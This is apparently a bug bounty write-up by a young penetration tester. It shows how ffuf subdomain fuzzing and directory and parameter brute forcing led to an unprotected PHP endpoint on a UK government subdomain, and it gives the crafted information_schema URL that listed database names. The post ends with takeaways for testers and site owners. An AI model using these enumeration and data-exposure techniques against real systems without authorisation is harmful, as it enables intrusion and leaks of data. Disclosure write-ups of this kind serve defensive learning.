BOOK THIS SPACE FOR AD
ARTICLE ADHello everyone, its Ahmad mansour again, 18 year old penetration tester and sometimes a bug bounty hunter. Without further intro lets get into the main topic of today, hacking the UK government and finding, reporting multiple critical vulnerabilities.
NOTE: this is done ethically, its part of a legal bug bounty work.
First of all, as any methodology i started to enumerate subdomains of my target, using active/passive ways, tried to automate my process with some tools, but the main issue was that the domain was still nearly new ( < 3 years ), there is no really available passive info to gather from 3rd party services and tools.
So i tried to dig deeper in order to find a good subdomain to start testing it, rather than going to the main domain which was mainly an informative page. i gathered my subdomain wordlist ( custom one based on target keywords ) and start fuzzing on the subdomains, using ffuf:
./ffuf -w /root/Desktop/wordlist.txt -u http://FUZZ.ab.com -of html -o resultAfter a bit of fuzzing i got a subdomain that has a 200 response, which means a valid normal page, but it was empty blank page.
Never leave any blank, 404 page, no one would make an empty website and host it online, imagine making a subdomain or a domain for yourself and not uploading anything.
so i started directly brute forcing, which is brute forcing to find some directories or hidden files
and i found an API directory that caught my interest, which is /name related to app/ directory it was a 403 directory, i did another fuzzing and found
Feel free to reach me on Instagram for any inquiry or projects ( __ahmadmansour__ )
/path/app.php
it was really weird, i knew there is something hidden there, so i ran another brute force attack but parameters based, like trying parameters randomly using a script/tool ( yeah i love brute forcing targets, it uncovers unexpected hidden endpoints ), and found two parameters which are db and tbl
so i crafted my url
subdomain.target.gov.uk/path/app.php?db=information_schema&tbl=SCHEMATA
and guess what ? i was able to list the DB names
and i could recursively do this attack to list a specific db tables and escalating this attack.
Takeaways:
As a pentester, bug bounty hunter:
1- Stop brute forcing randomly, and using a wordlist that everyone is spamming on bb targets
2- never trust a blank, 404 pages, these contain hidden gems
3- always brute force parameters, you never know what's hidden
if you are a dev, website owner:
1- remove unwanted, beta, unused subdomains ( always check what you are hosting, maybe you forgot something )
2- remember that making hidden files or weird names of files does not mean no one would be able to reach them, some hackers think outside the box, expect that everything is exposed whenever you put it on internet